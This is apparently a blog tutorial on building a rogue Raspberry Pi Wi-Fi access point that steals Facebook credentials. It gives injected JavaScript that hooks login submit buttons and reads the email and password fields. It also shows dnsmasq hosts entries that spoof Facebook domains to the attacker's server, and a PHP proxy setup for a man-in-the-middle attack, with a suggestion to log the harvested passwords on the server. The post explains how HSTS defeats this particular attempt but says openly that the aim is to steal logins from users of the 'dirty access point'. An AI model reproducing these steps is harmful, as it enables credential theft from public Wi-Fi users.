Make a Wi-Fi honeypot with Raspberry Pi 3 (and get blocked by HSTS)

After following the previous post explaining you how to turn your Raspberry Pi 3 into a Wi-Fi hotspot, we will now show you different pieces of code that can turn it into a nasty curious box.

Step 1 – Prepare your malicious JavaScript

A small JavaScript to get the login and password

We will modify some pages of Facebook on the fly to inject our homemade JavaScript which will modify the DOM of the page after it is loaded. Our piece of JavaScript here will look for all “submit” buttons on a form and add an action when the user clicks on it:

var x = document.getElementsByTagName("input");
for(i in x) {
    if(x[i].getAttribute("type") == "submit") {
     alert("I found a button '" + x[i].value + "'");
     x[i].setAttribute("onclick","javascript:alert('login:'+document.getElementById('email').value+'|password:'+document.getElementById('pass').value);");
    }
};

First we will test this script directly on the facebook login page. To do this you just have to add a new bookmark in your web browser: Name it TestJS and for the url type javascript: and paste the piece of code above. It should look like this:

javascript-bookmark

Go to http://www.facebook.com (be sure to be logged out). If you inspect the Log In button you can see the following:

Run the script from your bookmarks, you can see it works with the alert message “found button >> Log In” showing up. Also after that, you can notice that the Log In button code has changed in the inspector. If you click on the button, you will see a new alert message with the content of the login and password fields:

This slideshow requires JavaScript.

You can then modify the script so that it calls another php piece of code which will store the login and password hijacked on a logfile on our nginx server (with an AJAX request for instance).

Inject the script into some pages with a simple PHP proxy

We will use php and curl to fetch the content of the Facebook page and rewrite it exactly to the output. Well, exactly except for some pages which will have the extra piece of JavaScript we presented just before.

To do this, we start by installing php5 for nginx and the curl extension as follows:

pi@raspberrypi:~ $ sudo apt-get update
pi@raspberrypi:~ $ sudo apt-get install php5-curl php5-fpm

Note that you will need to configure nginx service to use php-fpm by having the following lines in the /etc/nginx/sites-available/default file:

location ~ \.php$ {
    try_files $uri = 404;
    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    fastcgi_pass unix:/run/php5-fpm.sock;
    fastcgi_index index.php;
    include fastcgi.conf;
    include fastcgi_params;
}

Then we will use this: https://github.com/joshdick/miniProxy/blob/master/miniProxy.php which is a simple php proxy script that we will modify later. For now just test it manually to make sure it is working fine: for instance try http://172.16.0.1/miniProxy.php?https://www.linkedin.com/.

Step 2 – Redirect specific sites to our own webserver

We want to catch every query to Facebook to do a Man-in-the-middle attack which will inject our JavaScript tested before. To do that, we need to edit the configuration of our DNS server:

pi@raspberrypi:~ $ sudo vim /etc/dnsmasq.conf

We tell it to read a specific hosts file where we will capture Facebook URLs by adding the following lines:

no-hosts
addn-hosts=/var/run/dnsmasq/hosts

Then we create that new hosts file:

pi@raspberrypi:~ $ sudo vim /var/run/dnsmasq/hosts

And we put the following content

127.0.0.1       honey.pot
172.16.0.1      www.facebook.com
172.16.0.1      m.facebook.com
172.16.0.1      facebook.com

Restart the dnsmasq service and check the result:

nslookup

Step 3 – Manage SSL connections

This is the tricky part: facebook uses SSL to encrypt all its traffic so we need to activate SSL on our webserver to handle it. Follow this well-explained tutorial to enable SSL on Nginx web server:

Once done, verify that the HTTPS port is opened with:

sudo netstat -a | grep "LISTEN"

netstat.png

Perfect. Now let’s test the redirection.

Step 4 – Test the DNS spoofing we just configured

Let’s test the access to Facebook by entering in the browser:

http://www.facebook.com (mind the absence of https which is important)

We get this result:

hsts

What happened? We have entered the URL without the https, however, Chrome has force-redirected us to the SSL version of the  URL before contacting our DNS service. Only then the request reached our nginx webserver, and since its certificate is not legit, we get this warning message and cannot continue. – FAIL!

Facebook website has implemented the HTTP Strict Transport Security which tells Chrome that access fo facebook.com can be done only with SSL, in other words, any attempt to access it using http will be automatically changed by the web browser.

It has two way of working, the most usual being to send an extra header information that the web browser will store for a certain time like a cookie:

Strict-Transport-Security: max-age=31536000

The other way, for major websites, it to get listed in the STS preloaded list (chrome://net-internals/#hsts), so that even the first access to the website cannot be hijacked.

So our attempt to create simple a MITM attack with Facebook will fail here thanks to this implementation of SSL and HSTS with the preloaded list. However you can already see how simple it is to change the content of a website which would not implement SSL or HSTS, and there are a lot of these websites around.

We will not give up yet. With all the pieces of code we tested here, in a next article, we will demonstrate another way to steal login and passwords from people who would use our dirty access point.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s